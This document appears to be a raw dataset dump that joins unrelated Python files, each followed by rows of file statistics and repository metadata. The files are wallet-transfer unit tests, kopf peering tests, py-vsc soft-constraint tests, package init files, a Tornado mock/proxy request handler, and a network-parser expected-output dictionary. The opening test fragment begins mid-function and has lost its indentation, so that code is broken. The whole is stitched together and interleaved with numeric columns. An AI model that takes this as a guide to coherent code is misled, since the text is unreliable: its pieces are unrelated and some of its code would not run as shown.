key_store = MockKeyStore()
key_store.list_keys.return_value = []
key_store.load_key.side_effect = [person1.entity]
key_store.lookup_address.return_value = person2.address
address_book = MockAddressBook()
address_book.keys.return_value = [person1.name, person2.name]
address_book.lookup_address.return_value = person2.address
args = Mock()
args.destination = person2.name
args.amount = 20000000000
args.charge_rate = 1
args.signers = [person1.name]
args.from_address = person2.name
args.network = 'super-duper-net'
with self.assertRaises(RuntimeError):
from pocketbook.commands.transfer import run_transfer
run_transfer(args)
# mock_create_api.assert_called_once_with('super-duper-net')
address_book.lookup_address.assert_called_once_with(person2.name)
@patch('getpass.getpass', side_effect=['weak-password'])
@patch('builtins.input', return_value='')
@patch('fetchai.ledger.serialisation.transaction.encode_transaction', spec=encode_transaction)
@patch('pocketbook.utils.create_api', spec=create_api)
@patch('pocketbook.address_book.AddressBook', spec=AddressBook)
@patch('pocketbook.key_store.KeyStore', spec=KeyStore)
def test_error_when_from_field_is_invalid(self, MockKeyStore, MockAddressBook, mock_create_api,
mock_encode_transaction, *args):
person1 = Person('Jane')
person2 = Person('Clare')
key_store = MockKeyStore()
key_store.list_keys.return_value = [person1.name]
key_store.load_key.side_effect = [person1.entity]
key_store.lookup_address.return_value = person2.address
address_book = MockAddressBook()
address_book.keys.return_value = [person2.name]
address_book.lookup_address.return_value = person2.address
args = Mock()
args.destination = person2.name
args.amount = 20000000000
args.charge_rate = 1
args.signers = [person1.name]
args.from_address = 'some-one-missing'
args.network = 'super-duper-net'
with self.assertRaises(RuntimeError):
from pocketbook.commands.transfer import run_transfer
run_transfer(args)
# mock_create_api.assert_called_once_with('super-duper-net')
address_book.lookup_address.assert_called_once_with(person2.name)
@patch('getpass.getpass', side_effect=['weak-password'])
@patch('builtins.input', return_value='')
@patch('fetchai.ledger.serialisation.transaction.encode_transaction', spec=encode_transaction)
@patch('pocketbook.utils.create_api', spec=create_api)
@patch('pocketbook.address_book.AddressBook', spec=AddressBook)
@patch('pocketbook.key_store.KeyStore', spec=KeyStore)
def test_error_case_with_bad_args(self, MockKeyStore, MockAddressBook, mock_create_api, mock_encode_transaction,
*args):
person1 = Person('Jane')
person2 = Person('Clare')
key_store = MockKeyStore()
key_store.list_keys.return_value = [person1.name]
key_store.load_key.side_effect = [person1.entity]
key_store.lookup_address.return_value = person2.address
address_book = MockAddressBook()
address_book.keys.return_value = [person2.name]
address_book.lookup_address.return_value = person2.address
args = Mock()
args.destination = person2.name
args.amount = 20000000000
args.charge_rate = 1
args.signers = []
args.from_address = 'some-one-missing'
args.network = 'super-duper-net'
with self.assertRaises(RuntimeError):
from pocketbook.commands.transfer import run_transfer
run_transfer(args)
# mock_create_api.assert_called_once_with('super-duper-net')
address_book.lookup_address.assert_called_once_with(person2.name)
| 42.737609
| 116
| 0.688724
| 1,694
| 14,659
| 5.706021
| 0.070248
| 0.037244
| 0.054624
| 0.068281
| 0.930788
| 0.927995
| 0.927167
| 0.921995
| 0.915684
| 0.915684
| 0
| 0.020056
| 0.214271
| 14,659
| 342
| 117
| 42.862573
| 0.819153
| 0.058667
| 0
| 0.841699
| 0
| 0
| 0.125408
| 0.070397
| 0
| 0
| 0
| 0
| 0.173745
| 1
| 0.030888
| false
| 0.042471
| 0.057915
| 0
| 0.096525
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cc5064a496995bfffd4d6648f0ec6741b39acce1
| 56
|
py
|
Python
|
generatemusic/__init__.py
|
WiktorSa/Music-Generation-with-LSTM-and-.wav-files
|
37b713b5e6193788a7710cc0fac4134efb74fa62
|
[
"MIT"
] | 1
|
2022-03-09T20:13:57.000Z
|
2022-03-09T20:13:57.000Z
|
generatemusic/__init__.py
|
WiktorSa/Music-Generation-with-LSTM-and-.wav-files
|
37b713b5e6193788a7710cc0fac4134efb74fa62
|
[
"MIT"
] | 1
|
2021-10-01T16:20:06.000Z
|
2021-10-01T17:25:30.000Z
|
generatemusic/__init__.py
|
WiktorSa/Music-Generation-with-LSTM-and-.wav-files
|
37b713b5e6193788a7710cc0fac4134efb74fa62
|
[
"MIT"
] | null | null | null |
from generatemusic.generate_music import generate_music
| 28
| 55
| 0.910714
| 7
| 56
| 7
| 0.714286
| 0.530612
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 56
| 1
| 56
| 56
| 0.942308
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cc79c2d92ed71d7c48de39d8c84e20f7ecb4a9ef
| 4,604
|
py
|
Python
|
tests/peering/test_apply_peers.py
|
tinyzimmer/kopf
|
74c42a2acdf2a72446d290fa1f27b53ec5d43218
|
[
"MIT"
] | null | null | null |
tests/peering/test_apply_peers.py
|
tinyzimmer/kopf
|
74c42a2acdf2a72446d290fa1f27b53ec5d43218
|
[
"MIT"
] | null | null | null |
tests/peering/test_apply_peers.py
|
tinyzimmer/kopf
|
74c42a2acdf2a72446d290fa1f27b53ec5d43218
|
[
"MIT"
] | null | null | null |
import aiohttp.web
import freezegun
import pytest
from kopf.engines.peering import NAMESPACED_PEERING_RESOURCE, CLUSTER_PEERING_RESOURCE
from kopf.engines.peering import Peer, apply_peers
@pytest.mark.usefixtures('with_both_crds')
@pytest.mark.parametrize('namespace, peering_resource', [
    pytest.param('ns', NAMESPACED_PEERING_RESOURCE, id='namespace-scoped'),
    pytest.param(None, CLUSTER_PEERING_RESOURCE, id='cluster-scoped'),
])
@freezegun.freeze_time('2020-12-31T23:59:59.123456')
async def test_applying_a_dead_peer_purges_it(
        hostname, aresponses, resp_mocker, namespace, peering_resource):
    """A peer whose lastseen is far in the past is patched out (status entry set to None)."""
    mock = resp_mocker(return_value=aiohttp.web.json_response({}))
    aresponses.add(hostname, peering_resource.get_url(name='name0', namespace=namespace),
                   'patch', mock)

    dead_peer = Peer(id='id1', name='...', namespace='ns1', lastseen='2020-01-01T00:00:00')
    await apply_peers(peers=[dead_peer], name='name0', namespace=namespace)

    assert mock.called
    body = await mock.call_args_list[0][0][0].json()
    assert set(body['status']) == {'id1'}
    assert body['status']['id1'] is None
@pytest.mark.usefixtures('with_both_crds')
@pytest.mark.parametrize('namespace, peering_resource', [
    pytest.param('ns', NAMESPACED_PEERING_RESOURCE, id='namespace-scoped'),
    pytest.param(None, CLUSTER_PEERING_RESOURCE, id='cluster-scoped'),
])
@freezegun.freeze_time('2020-12-31T23:59:59.123456')
async def test_applying_an_alive_peer_stores_it(
        hostname, aresponses, resp_mocker, namespace, peering_resource):
    """A still-alive peer is written into the peering object's status with its metadata."""
    mock = resp_mocker(return_value=aiohttp.web.json_response({}))
    aresponses.add(hostname, peering_resource.get_url(name='name0', namespace=namespace),
                   'patch', mock)

    alive_peer = Peer(id='id1', name='...', namespace='ns1', lastseen='2020-12-31T23:59:59')
    await apply_peers(peers=[alive_peer], name='name0', namespace=namespace)

    assert mock.called
    body = await mock.call_args_list[0][0][0].json()
    assert set(body['status']) == {'id1'}
    entry = body['status']['id1']
    assert entry['namespace'] == 'ns1'
    assert entry['priority'] == 0
    assert entry['lastseen'] == '2020-12-31T23:59:59'
    assert entry['lifetime'] == 60
@pytest.mark.usefixtures('with_both_crds')
@pytest.mark.parametrize('namespace, peering_resource', [
    pytest.param('ns', NAMESPACED_PEERING_RESOURCE, id='namespace-scoped'),
    pytest.param(None, CLUSTER_PEERING_RESOURCE, id='cluster-scoped'),
])
@pytest.mark.parametrize('lastseen', [
    pytest.param('2020-01-01T00:00:00', id='when-dead'),
    pytest.param('2020-12-31T23:59:59', id='when-alive'),
])
@freezegun.freeze_time('2020-12-31T23:59:59.123456')
async def test_keepalive(
        hostname, aresponses, resp_mocker, namespace, peering_resource, lastseen):
    """keepalive() refreshes the peer's entry, stamping the frozen 'now' as lastseen."""
    mock = resp_mocker(return_value=aiohttp.web.json_response({}))
    aresponses.add(hostname, peering_resource.get_url(name='name0', namespace=namespace),
                   'patch', mock)

    peer = Peer(id='id1', name='name0', namespace=namespace, lastseen=lastseen)
    await peer.keepalive()

    assert mock.called
    body = await mock.call_args_list[0][0][0].json()
    assert set(body['status']) == {'id1'}
    entry = body['status']['id1']
    assert entry['namespace'] == namespace
    assert entry['priority'] == 0
    assert entry['lastseen'] == '2020-12-31T23:59:59.123456'
    assert entry['lifetime'] == 60
@pytest.mark.usefixtures('with_both_crds')
@pytest.mark.parametrize('namespace, peering_resource', [
    pytest.param('ns', NAMESPACED_PEERING_RESOURCE, id='namespace-scoped'),
    pytest.param(None, CLUSTER_PEERING_RESOURCE, id='cluster-scoped'),
])
@pytest.mark.parametrize('lastseen', [
    pytest.param('2020-01-01T00:00:00', id='when-dead'),
    pytest.param('2020-12-31T23:59:59', id='when-alive'),
])
@freezegun.freeze_time('2020-12-31T23:59:59.123456')
async def test_disappear(
        hostname, aresponses, resp_mocker, namespace, peering_resource, lastseen):
    """disappear() removes the peer's entry regardless of whether it was alive or dead."""
    mock = resp_mocker(return_value=aiohttp.web.json_response({}))
    aresponses.add(hostname, peering_resource.get_url(name='name0', namespace=namespace),
                   'patch', mock)

    peer = Peer(id='id1', name='name0', namespace=namespace, lastseen=lastseen)
    await peer.disappear()

    assert mock.called
    body = await mock.call_args_list[0][0][0].json()
    assert set(body['status']) == {'id1'}
    assert body['status']['id1'] is None
| 42.238532
| 86
| 0.714379
| 609
| 4,604
| 5.228243
| 0.134647
| 0.103643
| 0.061558
| 0.062814
| 0.942211
| 0.921168
| 0.915829
| 0.915829
| 0.915829
| 0.915829
| 0
| 0.0603
| 0.117507
| 4,604
| 108
| 87
| 42.62963
| 0.723357
| 0
| 0
| 0.804598
| 0
| 0
| 0.192876
| 0.028236
| 0
| 0
| 0
| 0
| 0.206897
| 1
| 0
| false
| 0
| 0.057471
| 0
| 0.057471
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aee1352949d63c591612a92963e7f67ccafc2e59
| 7,958
|
py
|
Python
|
ve/unit/test_constraint_soft.py
|
fvutils/py-vsc
|
e30ffae1b750d8182d102b1fe5b1cfdce017a092
|
[
"Apache-2.0"
] | 54
|
2020-03-28T17:54:00.000Z
|
2022-03-27T08:53:13.000Z
|
ve/unit/test_constraint_soft.py
|
fvutils/py-vsc
|
e30ffae1b750d8182d102b1fe5b1cfdce017a092
|
[
"Apache-2.0"
] | 124
|
2020-04-10T03:06:03.000Z
|
2022-03-24T18:35:46.000Z
|
ve/unit/test_constraint_soft.py
|
fvutils/py-vsc
|
e30ffae1b750d8182d102b1fe5b1cfdce017a092
|
[
"Apache-2.0"
] | 17
|
2020-04-09T21:47:58.000Z
|
2022-02-23T19:37:37.000Z
|
'''
Created on Mar 21, 2020
@author: ballance
'''
import vsc
from vsc_test_case import VscTestCase
class TestConstraintSoft(VscTestCase):
    """Unit tests for soft constraints (vsc.soft) and their interaction with
    inline randomize_with constraints, dist constraints, and nested
    compound/array fields.

    NOTE: bare comparison expressions inside @vsc.constraint bodies and
    randomize_with blocks (e.g. ``self.a > 0``) are not no-ops -- the vsc DSL
    captures them via operator overloading to build the constraint model.
    """

    def test_soft_smoke(self):
        """A soft constraint yields to a contradicting inline hard constraint,
        but is honoured when nothing contradicts it."""
        @vsc.randobj
        class my_cls(object):
            def __init__(self):
                self.a = vsc.rand_uint8_t()
                self.b = vsc.rand_uint8_t()

            @vsc.constraint
            def a_lt_b(self):
                # Soft: may be discarded when it conflicts with hard constraints.
                vsc.soft(self.a < self.b)
                self.a > 0

        my_i = my_cls()

        # Inline hard constraint a == b contradicts the soft a < b,
        # so the soft constraint must be dropped.
        with my_i.randomize_with() as i:
            i.a == i.b
        print("a=" + str(my_i.a) + " b=" + str(my_i.b))
        self.assertEqual(my_i.a, my_i.b)

        # Should be able to respect the soft constraints
        with my_i.randomize_with() as i:
            i.a != i.b
        print("a=" + str(my_i.a) + " b=" + str(my_i.b))
        self.assertNotEqual(my_i.a, my_i.b)
        self.assertLess(my_i.a, my_i.b)
        self.assertGreater(my_i.a, 0)

    def test_soft_dist(self):
        """A dist constraint plus an inline hard ``a == 1`` must be solvable
        even though the soft constraint demands ``a > 5``."""
        @vsc.randobj
        class my_item(object):
            def __init__(self):
                self.a = vsc.rand_bit_t(8)
                self.b = vsc.rand_bit_t(8)

            @vsc.constraint
            def valid_ab_c(self):
                self.a < self.b
                vsc.soft(self.a > 5) #A

            @vsc.constraint
            def dist_a(self):
                vsc.dist(self.a, [
                    vsc.weight(0, 10),
                    vsc.weight(1, 100),
                    vsc.weight(2, 10),
                    vsc.weight(4, 10),
                    vsc.weight(8, 10)])

        item = my_item()
        # Repeated randomization: the inline a == 1 (#B) overrides the soft #A.
        for i in range(10):
            with item.randomize_with(debug=0) as it:
                it.b > 10
                it.a == 1 #B

    def test_soft_dist_priority(self):
        """Ensures that dist constraints take priority over soft constraints"""
        @vsc.randobj
        class my_item(object):
            def __init__(self):
                self.a = vsc.rand_bit_t(8)
                self.b = vsc.rand_bit_t(8)

            @vsc.constraint
            def valid_ab_c(self):
                self.a < self.b
                vsc.soft(self.a > 5) #A

            @vsc.constraint
            def dist_a(self):
                vsc.dist(self.a, [
                    vsc.weight(0, 10),
                    vsc.weight(1, 10),
                    vsc.weight(2, 10),
                    vsc.weight(4, 10),
                    vsc.weight(8, 10)])

        # Histogram of observed values of 'a'. Every dist bucket (0,1,2,4,8)
        # must be hit, which is only possible if the dist overrides soft #A.
        hist = [0]*9
        item = my_item()
        for i in range(100):
            item.randomize()
            hist[item.a] += 1
        self.assertGreater(hist[0], 0)
        self.assertGreater(hist[1], 0)
        self.assertGreater(hist[2], 0)
        self.assertGreater(hist[4], 0)
        self.assertGreater(hist[8], 0)

    def test_compound_array(self):
        """Soft constraint on an element of a rand list nested inside a
        compound object (10 children with 5 extra fields each)."""
        import vsc

        @vsc.randobj
        class Parent:
            def __init__(self):
                self.id = 0
                self.c1 = vsc.rand_list_t(vsc.attr(Child1()))
                for i in range(10):
                    self.c1.append(vsc.attr(Child1()))
                self.c2 = vsc.rand_list_t(vsc.attr(Child2()))
                for i in range(10):
                    self.c2.append(vsc.attr(Child2()))

            @vsc.constraint
            def parent_c(self):
                self.c1[0].a[1].value == self.c2[0].x[1].value # Multi-level
                pass

        @vsc.randobj
        class Field:
            def __init__(self, name, def_value):
                self.name = name
                self.value = vsc.rand_uint8_t(def_value)
            # @vsc.constraint
            # def soft_t(self):
            # #soft(self.value == 5)

        @vsc.randobj
        class Child1:
            def __init__(self):
                self.a = vsc.rand_list_t(vsc.attr(Field('a', 10)))
                for i in range(5):
                    self.a.append(vsc.attr(Field('a', 10)))
                self.b = vsc.rand_list_t(vsc.attr(Field('b', 10)))
                for i in range(5):
                    self.b.append(vsc.attr(Field('b', 10)))

            @vsc.constraint
            def test_c(self):
                #self.a[0].value < 7 # Works
                vsc.soft(self.a[0].value == 5) # Fails
                self.a[0].value < self.a[1].value

        @vsc.randobj
        class Child2:
            def __init__(self):
                self.x = vsc.rand_list_t(vsc.attr(Field('x', 10)))
                for i in range(5):
                    self.x.append(vsc.attr(Field('x', 10)))
                self.y = vsc.rand_list_t(vsc.attr(Field('y', 10)))
                for i in range(5):
                    self.y.append(vsc.attr(Field('y', 10)))

            @vsc.constraint
            def test_c(self):
                self.x[0].value < self.x[1].value

        inst=Parent()
        inst.randomize(debug=0)
        print("inst.c1[0].a[0].value", inst.c1[0].a[0].value)
        # Nothing contradicts the soft (value == 5), so it must hold.
        self.assertEqual(inst.c1[0].a[0].value, 5)
        print("inst.c1[0].a[1].value", inst.c1[0].a[1].value)
        # print()
        # print("inst.c2[0].x[0].value", inst.c2[0].x[0].value)
        # print("inst.c2[0].x[1].value", inst.c2[0].x[1].value)

    def test_compound_array_min(self):
        """Minimal variant of test_compound_array: 1 child / 2 fields,
        exercising the same soft-constraint path with the smallest model."""
        import vsc

        @vsc.randobj
        class Parent:
            def __init__(self):
                self.id = 0
                self.c1 = vsc.rand_list_t(vsc.attr(Child1()))
                for i in range(1):
                    self.c1.append(vsc.attr(Child1()))
                self.c2 = vsc.rand_list_t(vsc.attr(Child2()))
                for i in range(1):
                    self.c2.append(vsc.attr(Child2()))

            @vsc.constraint
            def parent_c(self):
                self.c1[0].a[1].value == self.c2[0].x[1].value # Multi-level
                pass

        @vsc.randobj
        class Field:
            def __init__(self, name, def_value):
                self.name = name
                self.value = vsc.rand_uint8_t(def_value)
            # @vsc.constraint
            # def soft_t(self):
            # #soft(self.value == 5)

        @vsc.randobj
        class Child1:
            def __init__(self):
                self.a = vsc.rand_list_t(vsc.attr(Field('a', 10)))
                for i in range(2):
                    self.a.append(vsc.attr(Field('a', 10)))
                self.b = vsc.rand_list_t(vsc.attr(Field('b', 10)))
                for i in range(2):
                    self.b.append(vsc.attr(Field('b', 10)))

            @vsc.constraint
            def test_c(self):
                #self.a[0].value < 7 # Works
                vsc.soft(self.a[0].value == 5) # Fails
                self.a[0].value < self.a[1].value

        @vsc.randobj
        class Child2:
            def __init__(self):
                self.x = vsc.rand_list_t(vsc.attr(Field('x', 10)))
                for i in range(2):
                    self.x.append(vsc.attr(Field('x', 10)))
                self.y = vsc.rand_list_t(vsc.attr(Field('y', 10)))
                for i in range(2):
                    self.y.append(vsc.attr(Field('y', 10)))

            @vsc.constraint
            def test_c(self):
                self.x[0].value < self.x[1].value

        inst=Parent()
        inst.randomize(debug=0)
        print("inst.c1[0].a[0].value", inst.c1[0].a[0].value)
        # Nothing contradicts the soft (value == 5), so it must hold.
        self.assertEqual(inst.c1[0].a[0].value, 5)
        print("inst.c1[0].a[1].value", inst.c1[0].a[1].value)
        # print()
        # print("inst.c2[0].x[0].value", inst.c2[0].x[0].value)
        # print("inst.c2[0].x[1].value", inst.c2[0].x[1].value)
| 31.832
| 83
| 0.447223
| 1,030
| 7,958
| 3.318447
| 0.096117
| 0.049152
| 0.056173
| 0.045056
| 0.815097
| 0.807197
| 0.803101
| 0.781451
| 0.772967
| 0.772967
| 0
| 0.04887
| 0.416311
| 7,958
| 250
| 84
| 31.832
| 0.686975
| 0.085574
| 0
| 0.80791
| 0
| 0
| 0.015193
| 0.011602
| 0
| 0
| 0
| 0
| 0.062147
| 1
| 0.152542
| false
| 0.011299
| 0.022599
| 0
| 0.242938
| 0.033898
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9d96172237187ddcf962ef8f9aa5867a793702b3
| 100
|
py
|
Python
|
src/eurocodepy/ec2/sls/__init__.py
|
pcachim/eurocodepy
|
8b68e733e5ccaa41b16135d3a3f8e9d2544fc112
|
[
"MIT"
] | null | null | null |
src/eurocodepy/ec2/sls/__init__.py
|
pcachim/eurocodepy
|
8b68e733e5ccaa41b16135d3a3f8e9d2544fc112
|
[
"MIT"
] | null | null | null |
src/eurocodepy/ec2/sls/__init__.py
|
pcachim/eurocodepy
|
8b68e733e5ccaa41b16135d3a3f8e9d2544fc112
|
[
"MIT"
] | null | null | null |
from .longterm import cemprops
from .longterm import creep_coef
from .longterm import shrink_strain
| 25
| 35
| 0.85
| 14
| 100
| 5.928571
| 0.571429
| 0.433735
| 0.650602
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 100
| 3
| 36
| 33.333333
| 0.943182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9dd9ad553db256f1f9e752a1ae52e7f876e9962f
| 8,008
|
py
|
Python
|
auto/mockserver/apps/main/handlers.py
|
Strugglingrookie/oldboy2
|
8ed6723cab1f54f2ff8ea0947c6f982aef7e1b47
|
[
"Apache-2.0"
] | 1
|
2021-06-15T07:01:23.000Z
|
2021-06-15T07:01:23.000Z
|
auto/mockserver/apps/main/handlers.py
|
Strugglingrookie/oldboy2
|
8ed6723cab1f54f2ff8ea0947c6f982aef7e1b47
|
[
"Apache-2.0"
] | 3
|
2020-02-13T14:35:36.000Z
|
2021-06-10T21:27:14.000Z
|
auto/mockserver/apps/main/handlers.py
|
Strugglingrookie/oldboy2
|
8ed6723cab1f54f2ff8ea0947c6f982aef7e1b47
|
[
"Apache-2.0"
] | 1
|
2020-04-09T02:13:12.000Z
|
2020-04-09T02:13:12.000Z
|
# coding=utf-8
import tornado.web
import tornado.concurrent
import tornado.gen
from concurrent.futures import ThreadPoolExecutor
from dao.main_curd import *
from plugin import logger
import sys, time, json
from tornado.httpclient import HTTPRequest
try:
from tornado.curl_httpclient import CurlAsyncHTTPClient as AsyncHTTPClient
except ImportError:
from tornado.simple_httpclient import SimpleAsyncHTTPClient as AsyncHTTPClient
# Python 2 only: reload sys to re-expose setdefaultencoding, then force UTF-8
# as the process-wide default string encoding (needed for the non-ASCII log
# messages emitted below).
reload(sys)
sys.setdefaultencoding('utf8')
_result = {}      # module-level scratch dict; not referenced in this chunk -- TODO confirm usage
TIMEOUT = 30      # presumably a request timeout in seconds; unused in this chunk -- verify
MAX_WORKERS = 50  # size of the shared BaseHandler thread pool below
class BaseHandler(tornado.web.RequestHandler):
    """Common base for the mock-server handlers: shared executor and auth lookup."""

    # Shared thread pool (sized by MAX_WORKERS) for subclasses that offload
    # blocking work; no subclass in this chunk uses it directly -- TODO confirm.
    executor = ThreadPoolExecutor(max_workers=MAX_WORKERS)

    def get_current_user(self):
        """Return the current user from the 'user' secure cookie (None if absent)."""
        return self.get_secure_cookie("user")
class IndexHandler(BaseHandler):
    """Catch-all mock/proxy handler.

    For each GET/POST request it either:
      * serves a synthetic error page (``/errorpage/<status>?path=...``),
      * serves a configured mock response when ``checkMockMatch`` finds one, or
      * forwards the request unchanged to the real upstream service resolved
        via ``getServerHost`` and relays the upstream response back.

    The previous revision duplicated the entire ~80-line body between ``post``
    and ``get``; both now delegate to the shared ``_handle_request``.
    """

    def on_response(self, response):
        """Relay the upstream response (status, headers, body) to the client."""
        if response.code != 200:
            self.set_status(response.code, response.error.message)
        else:
            for k in response.headers:
                self.set_header(k, response.headers.get(k))
            self.write(response.body)
        self.finish()

    def _handle_request(self):
        """Shared implementation for GET and POST (identical behavior for both).

        Finishes the request itself in every path; callers must not write
        to the response after this returns.
        """
        try:
            req = self.request
            protocol = req.protocol
            method = req.method
            uri = req.uri
            urigroups = uri.split('/')
            # Synthetic error pages: /errorpage/<status-code>?path=<original-url>
            if urigroups[1] == "errorpage":
                path = self.get_argument("path")
                sc = urigroups[2]
                if sc == "404":
                    reason = "<h1>Not Found</h1><p>The requested URL %s was not found on this server.</p>" % path
                else:
                    reason = "<h1>Internal Server Error</h1>"
                self.set_status(int(sc))
                self.write(reason)
                self.finish()
                return
        except Exception as e:
            self.set_status(500, "Internal Server Error!")
            logger.error(e.message, 'line %d (/apps/api/handlers.py)' % (sys._getframe().f_lineno - 2))
            self.finish()
            return

        try:
            # Raw header/body are kept separately (headers_o/body_o) for
            # verbatim upstream forwarding; request_* copies are consumed
            # by the mock-matching logic below.
            headers_o = req.headers
            body_o = req.body
            request_headers = req.headers
            request_query = req.arguments
            request_body = req.body
            # The gateway tags requests with the target service's id.
            serviceName = request_headers.get("downstream-service-id", None)
        except Exception as e:
            self.set_status(500, "Internal Server Error!")
            logger.error(e.message, 'line %d (/apps/api/handlers.py)' % (sys._getframe().f_lineno - 2))
            self.finish()
            return

        if not serviceName:
            self.set_status(500, "The request header resolution failed!")
            logger.error("请求头解析失败!", 'line %d (/apps/api/handlers.py)' % (sys._getframe().f_lineno - 2))
            self.finish()
            return

        # Best effort: treat a non-JSON (or empty) body as an empty mapping.
        if not request_body:
            request_body = {}
        else:
            try:
                request_body = json.loads(request_body)
            except Exception:
                request_body = {}

        # Flatten the query arguments, keeping only the last value per key.
        request_query = dict((k, v[-1]) for k, v in request_query.items())

        responseID, headers = checkMockMatch(serviceName, uri, request_headers, request_query,
                                             request_body)
        if responseID:
            # A mock is configured for this request: serve it directly.
            response = getResponseById(responseID)
            self.set_status(response.get("statusCode"))
            self.set_header("Content-Type", response.get("type"))
            if headers:
                for hd in headers:
                    self.add_header(hd.get("name"), hd.get("value"))
            self.write(response.get("response"))
            self.finish()
        else:
            # No mock: proxy the request to the real service.
            try:
                serverIP, serverPort = getServerHost(serviceName)
            except Exception as e:
                self.set_status(500, "Internal Server Error!")
                logger.error(e.message, 'line %d (/apps/api/handlers.py)' % (sys._getframe().f_lineno - 2))
                self.finish()
            else:
                serverhost = "%s://%s:%s" % (protocol, serverIP, serverPort)
                AsyncHTTPClient().fetch(
                    HTTPRequest(
                        url=serverhost + uri,
                        method=method,
                        headers=headers_o,
                        body=body_o,
                        validate_cert=False
                    ),
                    self.on_response)

    @tornado.web.asynchronous
    def post(self):
        self._handle_request()

    @tornado.web.asynchronous
    def get(self):
        self._handle_request()
if __name__ == '__main__':
    # Placeholder entry point: these values are assigned but never used -- TODO confirm intent.
    skip = False
    ret = ""
| 37.596244
| 111
| 0.526224
| 821
| 8,008
| 5.008526
| 0.183922
| 0.027237
| 0.041099
| 0.031128
| 0.794261
| 0.794261
| 0.794261
| 0.794261
| 0.794261
| 0.794261
| 0
| 0.012094
| 0.37013
| 8,008
| 212
| 112
| 37.773585
| 0.803132
| 0.001499
| 0
| 0.840796
| 0
| 0.00995
| 0.109846
| 0.028275
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.054726
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9dec91a91b61357a1df3e055ec48ae8f62513ca1
| 6,806
|
py
|
Python
|
src/genie/libs/parser/iosxr/tests/ShowL2vpnForwardingBridgeDomainMacAddress/cli/equal/golden_output_1_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 204
|
2018-06-27T00:55:27.000Z
|
2022-03-06T21:12:18.000Z
|
src/genie/libs/parser/iosxr/tests/ShowL2vpnForwardingBridgeDomainMacAddress/cli/equal/golden_output_1_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 468
|
2018-06-19T00:33:18.000Z
|
2022-03-31T23:23:35.000Z
|
src/genie/libs/parser/iosxr/tests/ShowL2vpnForwardingBridgeDomainMacAddress/cli/equal/golden_output_1_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 309
|
2019-01-16T20:21:07.000Z
|
2022-03-30T12:56:41.000Z
|
# Every learned MAC entry in this golden capture carries the same attributes;
# only the MAC address itself varies, covering the contiguous range
# 0001.00ff.0002 .. 0001.00ff.0013 (18 dynamic entries on Te0/0/1/0/3.3).
_COMMON_ENTRY = {
    'lc_learned': 'N/A',
    'learned_from': 'Te0/0/1/0/3.3',
    'mapped_to': 'N/A',
    'resync_age': '0d 0h 0m 14s',
    'type': 'dynamic',
}

expected_output = {
    'mac_table': {
        'Te0/0/1/0/3.3': {
            'mac_address': {
                '0001.00ff.{0:04x}'.format(suffix): dict(_COMMON_ENTRY)
                for suffix in range(0x02, 0x14)
            },
        },
    },
}
| 39.34104
| 52
| 0.23112
| 498
| 6,806
| 3.008032
| 0.088353
| 0.048064
| 0.063418
| 0.076101
| 0.925234
| 0.925234
| 0.919893
| 0.919893
| 0.919893
| 0.919893
| 0
| 0.151503
| 0.633412
| 6,806
| 172
| 53
| 39.569767
| 0.448898
| 0
| 0
| 0.841176
| 0
| 0
| 0.261464
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d1ade1d80503631be0f40c5c062da5365c98fc74
| 3,582
|
py
|
Python
|
